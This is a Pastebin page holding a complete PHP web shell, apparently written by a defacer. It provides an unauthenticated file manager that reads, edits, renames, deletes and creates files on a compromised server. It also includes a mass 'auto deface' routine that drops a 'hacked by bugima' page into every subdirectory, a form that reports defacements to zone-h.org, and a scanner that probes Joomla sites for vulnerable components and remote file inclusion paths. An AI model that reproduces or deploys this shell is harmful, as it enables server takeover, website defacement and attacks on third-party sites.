Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $self = $_SERVER['PHP_SELF'];
- $dir = $_GET["dir"];
- $nampak = $_GET["nampak"];
- $edit = $_POST["edit"];
- $rename = $_GET["rename"];
- $namakan = $_POST["namakan"];
- $padam = $_GET["padam"];
- $autodeface = $_GET["ok"];
- $zonhi = $_GET["bugi"];
- $dapatdir = $_GET["buatdir"];
- $jumlabah = $_GET["jumlabah"];
- $newfile = $_POST["newfile"];
- $editnew = $_POST["editnew"];
- $cretnew = $_GET["cretnew"];
- function zonmas()
- {
- echo '<center>
- <form action="" method="post">
- <div id="option">
- <font class="res"><p>Defacer<br />
- <span class="ok"><input type="text" name="defacer" class="ibtn" /></span> </p>
- <p>How to hack <br /><select class="ibtn" name="hackmode">
- <option >--------SELECT--------</option>
- <option value="1">known vulnerability (i.e. unpatched system)</option>
- <option
- value="2" >undisclosed (new) vulnerability</option>
- <option
- value="3" >configuration / admin. mistake</option>
- <option
- value="4" >brute force attack</option>
- <option
- value="5" >social engineering</option>
- <option
- value="6" >Web Server intrusion</option>
- <option
- value="7" >Web Server external module intrusion</option>
- <option
- value="8" >Mail Server intrusion</option>
- <option
- value="9" >FTP Server intrusion</option>
- <option
- value="10" >SSH Server intrusion</option>
- <option
- value="11" >Telnet Server intrusion</option>
- <option
- value="12" >RPC Server intrusion</option>
- <option
- value="13" >Shares misconfiguration</option>
- <option
- value="14" >Other Server intrusion</option>
- <option
- value="15" >SQL Injection</option>
- <option
- value="16" >URL Poisoning</option>
- <option
- value="17" >File Inclusion</option>
- <option
- value="18" >Other Web Application bug</option>
- <option
- value="19" >Remote administrative panel access through bruteforcing</option>
- <option
- value="20" >Remote administrative panel access through password guessing</option>
- <option
- value="21" >Remote administrative panel access through social engineering</option>
- <option
- value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
- <option
- value="23" >Access credentials through Man In the Middle attack</option>
- <option
- value="24" >Remote service password guessing</option>
- <option
- value="25" >Remote service password bruteforce</option>
- <option
- value="26" >Rerouting after attacking the Firewall</option>
- <option
- value="27" >Rerouting after attacking the Router</option>
- <option
- value="28" >DNS attack through social engineering</option>
- <option
- value="29" >DNS attack through cache poisoning</option>
- <option
- value="30" >Not available</option>
- </select></p>
- <p> Cause of hack ? <br /><select class="ibtn" name="reason">
- <option >--------SELECT--------</option>
- <option
- value="1" >Heh...just for fun!</option>
- <option
- value="2" >Revenge against that website</option>
- <option
- value="3" >Political reasons</option>
- <option
- value="4" >As a challenge</option>
- <option
- value="5" >I just want to be the best defacer</option>
- <option
- value="6" >Patriotism</option>
- <option
- value="7" >Not available</option>
- </select> </p>
- <p>Sites <br />
- <span class="fur">Put all the sites on the server</span><br />
- <span class=""><textarea name="domain" class="conten"></textarea></span> </p>
- <p><button type="submit" value="Send" class="vutun"/>SEND</button>
- </font></form>
- <br>
- </div>
- </center>';
- }
- echo '<div class="adiv"><center><img src="http://blog.flamingtext.com/blog/2013/07/14/flamingtext_com_1373813801_580797130.gif"></center><br /><div class="atas"><font class="os">Operating System:<font class="res">'.php_uname().PHP_OS.'</font><br />
- Total HDD:<font class="res">'.disk_total_space("/").' bytes</font><br />
- Total Freespace:<font class="res">'.disk_free_space("/").' bytes</font>
- </font>
- </div>
- <div class="tool"><a class="autodefacebtn" href="'.$self.'?ok=haha">Auto Deface Tool</a><a class="autodefacebtn" href="'.$self.'?">Filemanager</a><a class="autodefacebtn" href="'.$self.'?bugi=haha">zone-h</a><a class="autodefacebtn" href="'.$self.'?jumlabah=haha">Joomla COM scanner</a>
- </div>
- ';
- //TOOL AUTODEFACE
- function autodeface()
- {
- echo '<br />
- <font class="up">AUTO DEFACE TOOL</font>
- <br /><font class="os"><form action="" method="post">
- file name :<br />
- <input class="ibtn" name="nameauto" value="bugima.php" width="70%"><br />
- folder path:<br />
- <input class="ibtn" name="pathauto" width="70%" value="'.getcwd().'/"><br />
- content:<br /><textarea class="conten" name="contentauto" cols="30" rows="30">hacked by bugima</textarea><br />
- <button class="vutun" type="submit">Deface</button>
- </form></font>';
- }
- //zonh tool
- $hacker = $_POST['defacer'];
- $method = $_POST['hackmode'];
- $reson = $_POST['reason'];
- $site = $_POST['domain'];
- if($site != null)
- { $allsite = preg_split('/(\r?\n)+/', $site);
- foreach($allsite as $sites)
- {
- $k = curl_init("http://zone-h.org/notify/single");
- curl_setopt($k,CURLOPT_POST,true);
- curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $sites."&hackmode=".$method."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $tetek = curl_exec($k);
- curl_close($k);
- }
- }
- else
- {
- }
- //untuk open direktory dan file
- function kasilist()
- {
- $dir = $_GET["dir"];
- $fol = scandir($dir);
- foreach($fol as $fo)
- {
- if($fo === ".")
- {
- $dirname = dirname($dir);
- echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<</a>";
- }
- elseif($fo === "..")
- {
- $dirname = dirname($dir);
- echo "<a class='up' href='".$self."?dir=".$dirname."'>UP</a><a href='".$self."?buatdir=".$dir."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".$dir."/newfile.php' class='buatdir'>Make File</a></div>";
- }
- else
- {
- $isdir = is_file($dir."/".$fo);
- if($isdir === false)
- {
- echo "<div class='line'><a class='dir' href='".$self."?dir=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$dir."/".$fo."'> Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
- </div>";
- }
- else
- {
- echo "<div class='line'><a class='link' href='".$self."?nampak=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$dir."/".$fo."'> Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
- </div>";
- }
- }
- }
- }
- function kaslist()
- {
- $fol2 = scandir(getcwd());
- foreach($fol2 as $fo2)
- {
- if($fo2 === ".")
- {
- $dirname = dirname(getcwd().$fo2);
- echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<".$fo."</a>";
- }
- elseif($fo2 === "..")
- {
- $dirname = dirname(getcwd().$fo2);
- echo "<a class='up' href='".$self."?dir=".$dirname."'>UP".$fo."</a><a href='".$self."?buatdir=".getcwd()."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".getcwd()."/newfile.php' class='buatdir'>Make File</a></div>";
- }
- else
- {
- $isdir2 = is_dir($fo2);
- if($isdir2 === true)
- {
- $root = getcwd();
- echo "<div class='line'><a class='dir' href='".$self."?dir=".$root."/".$fo2."'>".$fo2."</a>
- <a class='rename' href='".$self."?rename=".$root."/".$fo2."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$root."/".$fo2."'> Delete</a>
- <font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
- </div>";
- }
- else
- {
- echo "<div class='line'><a class='link' href='".$self."?nampak=".$root."/".$fo2."'>".$fo2."</a><a class='rename' href='".$self."?rename=".$root."/".$fo2."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$root."/".$fo2."'> Delete</a>
- <font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
- </div>";
- }
- }
- }
- }
- function untukopen()
- {
- $nampak = $_GET["nampak"];
- $content = file_get_contents($nampak);
- echo "<font class='up'>EDIT FILE<br /></font><form action='' method='post'>
- <textarea class='conten' name='edit'>".$content."</textarea><br />
- <button type='submit' class='vutun'>Save</button>
- </form><br />";
- $back = dirname($nampak);
- echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";
- }
- //untuk buat file
- function untukbuatfile()
- {
- echo "<font class='up'>CREATE FILE<br /></font><form action='' method='post'>
- <font class='os'>Content:<br /><textarea class='conten' name='editnew'>".$content."</textarea><br />
- File name:<br /><input name='newfile' class='ibtn' value='".$_GET["cretnew"]."'><br /></font>
- <button type='submit' class='vutun'>Save</button>
- </form><br />";
- $back = dirname($nampak);
- echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";
- }
- //untuk open file
- if($rename != null)
- {
- echo '<font class="up">RENAME FILE<br /></font><form action="" method="post">
- <input name="namakan" value="'.$rename.'" class="ibtn">
- <br /><button type="submit" class="rbtn">rename</button>
- </form>';
- }
- else
- {
- if($nampak != null)
- {
- untukopen();
- }
- elseif($autodeface != null)
- {
- autodeface();
- }
- elseif($zonhi != null)
- {
- zonmas();
- }
- elseif($dapatdir != null)
- {
- buatdir();
- }
- elseif($jumlabah != null)
- {
- jomlascn();
- }
- elseif($cretnew != null)
- {
- untukbuatfile();
- }
- else
- {
- If($dir != null)
- {
- $dir = $_GET["dir"];
- kasilist();
- }
- else
- {
- $dir = $_GET["dir"];
- kaslist();
- }
- }
- }
- //untuk hide
- //untuk edit file
- if($edit != null)
- {
- $file = fopen($nampak,"w");
- fwrite($file,$edit);
- fclose($file);
- echo "<br /><font class='result'>File Saved</font>";
- }
- else
- {
- }
- //untuk buat file
- if($newfile != null)
- {
- $filenew = fopen($newfile,"w");
- fwrite($filenew,$editnew);
- fclose($filenew);
- echo "<br /><font class='result'>File Saved</font>";
- }
- else
- {
- }
- //untuk rename file
- if($namakan != null)
- {
- rename($rename,$namakan);
- echo "<font class='result'>Renamed</font>";
- }
- else
- {
- }
- //untuk padam file
- if($padam != null)
- {
- unlink($padam);
- echo "<font class='result'>deleted</font>";
- }
- else
- {
- }
- //TOOL AUTODEFACE FUNGSI
- $defA = $_POST["nameauto"];
- $conA = $_POST["contentauto"];
- $dirA = $_POST["pathauto"];
- $folA = scandir($dirA);
- if($defA != null)
- {
- foreach($folA as $foA)
- {
- if(is_dir($dirA.$foA) === true)
- {
- $fileA = fopen($dirA.$foA.'/'.$defA,"w");
- fwrite($fileA,$conA);
- fclose($fileA);
- echo '<a class="dir" href="http://'.$foA.'/'.$defA.'">'.$foA.'</a><font class="res">:::defaced</font><br />';
- }
- else
- {
- }
- }
- }
- else
- {
- }
- //buat dir
- function buatdir()
- {
- echo '<form action="" method="post"><font class="os">Dir Name:<br /></font><input name="mdir" class="ibtn" value="'.$_GET["buatdir"].'/newdir"><br />
- <button type="submit" class="rbtn">Make Directory</button></form>';
- }
- $mdir = $_POST["mdir"];
- if($mdir != null)
- {
- mkdir($mdir, 0700);
- echo "<font class='res'>dir created</font>";
- }
- else
- {
- }
- //JOOMLA COMPONENT
- function jomlascn()
- {
- echo '<form action="" method="post">
- <font class="os">Url:</font><br /><input name="urljom" class="ibtn" value="http://example.com">
- <button type="submit" class="rbtn">SCAN</button>
- </form>';
- }
- $urljom = $_POST["urljom"];
- if($urljom != null)
- {
- $comx = "/index.php?option=com_collector
- /index.php?option=com_jemessenger
- /index.php?option=com_ksadvertiser
- /index.php?option=com_jce
- /index.php?option=com_svmap
- /index.php?option=com_NeoRecruit
- /index.php?option=com_facebook
- /index.php?option=com_jdownloads
- /index.php?option=com_movm
- /index.php?option=com_restaurante
- /index.php?option=com_frontpage
- /index.php?option=com_ignitegallery
- /index.php?option=com _if_surfalert
- /index.php?option=com_newsfeeds
- /index.php?option=com_fss
- /index.php?option=com_jobprofile
- /index.php?option=com_wrapper
- /index.php?option=com_jphoto
- /index.php?option=com_acymailing
- /index.php?option=spidercatalog
- /index.php?option=com_joomla_flash_uploader
- /index.php?option=com_myalbum
- /index.php?option=com_ponygallery
- /index.php?option=com_tag
- /index.php?option=com_rsfiles
- /index.php?option=com_qcontacts
- /index.php?option=com_races
- /index.php?option=com_bch
- /index.php?option=com_idoblog
- /index.php?option=com_user
- /index.php?option=com_beeheard
- /index.php?option=com_rsform
- /index.php?option=com_xsstream-dm
- /index.php?option=com_virtuemart
- /index.php?option=com_fireboard
- /index.php?option=com_clasifier
- /index.php?option=com_joomloads
- /index.php?option=com_na_content
- /index.php?option=com_pms
- /index.php?option=com_media_library
- /index.php?option=com_simpleshop
- /index.php?option=com_gmaps
- /index.php?option=com_rpx
- /index.php?option=com_album
- /index.php?option=com_books
- /index.php?option=com_product
- /index.php?option=com_pccookbook
- /index.php?option=com_fabrik
- /index.php?option=com_phocagallery
- /index.php?option=com_kunena
- /index.php?option=com_content
- /index.php?option=com_facileforms
- /index.php?option=com_cpg
- /index.php?option=com_smf
- /index.php?option=com_rsgallery
- /index.php?option=com_mtree
- /index.php?option=com_galleria
- /index.php?option=com_mgm
- /index.php?option=com_webring
- /index.php?option=com_a6mambocredits
- /index.php?option=com_uhp
- /index.php?option=com_cropimage
- /index.php?option=com_linkdirectory
- /index.php?option=com_comprofiler
- /index.php?option=com_phpshop
- /index.php?option=com_artlinks
- /index.php?option=com_remository
- /index.php?option=com_performs
- /index.php?option=com_extended_registration
- /index.php?option=com_zoom
- /index.php?option=com_serverstat
- /index.php?option=com_simpleboard
- /index.php?option=com_extcalendar
- /components/com_facileforms/facileforms.frame.php?ff_compath=
- /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
- /components/com_zoom/includes/database.php?mosConfig_absolute_path=
- /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
- /components/com_performs/performs.php?mosConfig_absolute_path=
- /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
- /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
- /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
- /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
- /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
- /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
- /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
- /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
- /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
- /administrator/components/com_webring/admin.webring.docs.php?component_dir=
- /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
- /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
- /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
- /components/com_performs/performs.php?mosConfig_absolute_path=
- /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
- /components/com_smf/smf.php?mosConfig_absolute_path=
- /components/com_cpg/cpg.php?mosConfig_absolute_path=
- /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
- /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
- /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
- /components/com_simpleboard
- /components/com_extcalendar";
- $arrayjom = preg_split('/(\r?\n)+/', $comx);
- foreach($arrayjom as $allcom)
- {
- $tazjom = curl_init($urljom.$allcom);
- curl_setopt($tazjom, CURLOPT_RETURNTRANSFER, true);
- $tobjom = curl_exec($tazjom);
- curl_close($tazjom);
- if($tobjom === false)
- {
- }
- else
- {
- $ti = strripos($tobjom, "404");
- $ta = strripos($tobjom, "not exist");
- $te = strripos($tobjom, "ponent not found");
- if($ti === false & $ta === false & $te === false)
- {
- echo "<font class='os'>its have:<font class='res'>".$allcom."</font> component</font><br />";
- }
- else
- {
- }
- }
- }
- }
- else
- {
- }
- ?>
- <style>
- body
- {
- background-color:black;
- }
- .line
- {
- border:2px green outset;
- width:100%;
- }
- .linerext
- {
- text-shadow: 0 0 20px green;
- font-color:green;
- }
- .conten
- {
- border:2px green outset;
- width:70%;
- height:400px;
- }
- .vutun
- {
- border:2px red outset;
- width:70%;
- color:white;
- background-color:red;
- }
- .link
- {
- text-shadow: 0 0 20px green;
- color:white;
- text-decoration:none;
- color:green;
- }
- .rename
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- }
- .dir
- {
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:grey;
- }
- .ibtn
- {
- border:2px red outset;
- width:60%;
- color:red;
- background-color:black;
- }
- .rbtn
- {
- border:2px red outset;
- width:60%;
- color:white;
- background-color:red;
- }
- .up
- {
- text-shadow: 0 0 20px red;
- color:red;
- font-size:30px;
- text-decoration:none;
- }
- .result
- {
- text-shadow: 0 0 20px white;
- color:white;
- font-size:20px;
- text-decoration:none;
- }
- .os
- {
- text-shadow: 0 0 20px white;
- color:white;
- font-size:20px;
- text-decoration:none;
- }
- .atas
- {
- border:3px grey #333333;
- background-color:#333333;
- width:100%;
- }
- .res
- {
- text-shadow: 0 0 20px red;
- color:red;
- font-size:20px;
- text-decoration:none;
- }
- .tool
- {
- border:3px outset #005533;
- background-color:#005533;
- width:100%;
- }
- .tol
- {
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- width:20px;
- }
- .autodefacebtn {
- -moz-box-shadow:inset 2px 15px 0px 0px #f29c93;
- -webkit-box-shadow:inset 2px 15px 0px 0px #f29c93;
- box-shadow:inset 2px 15px 0px 0px #f29c93;
- background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fe1a00), color-stop(1, #ce0100) );
- background:-moz-linear-gradient( center top, #fe1a00 5%, #ce0100 100% );
- filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fe1a00', endColorstr='#ce0100');
- background-color:#fe1a00;
- -moz-border-radius:3px;
- -webkit-border-radius:3px;
- border-radius:3px;
- border:1px solid #d83526;
- display:inline-block;
- color:#ffffff;
- font-family:arial;
- font-size:15px;
- font-weight:bold;
- padding:6px 24px;
- text-decoration:none;
- text-shadow:1px 1px 0px #b23e35;
- }.autodefacebtn:hover {
- background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ce0100), color-stop(1, #fe1a00) );
- background:-moz-linear-gradient( center top, #ce0100 5%, #fe1a00 100% );
- filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ce0100', endColorstr='#fe1a00');
- background-color:#ce0100;
- }.autodefacebtn:active {
- position:relative;
- top:1px;
- }
- .buatdir
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- }
- .filesize
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- }
- .adiv
- {
- border:3px grey outset;
- width:100%;
- }
- </style>
- </div>
- <object width="0" height="0"><param name="movie" value="http://www.youtube.com/v/8o1q8VXmiE8?version=3&hl=en_US&autoplay=1&loop=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/8o1q8VXmiE8?version=3&hl=en_US&autoplay=1&loop=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="1" height="0"></embed></object>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement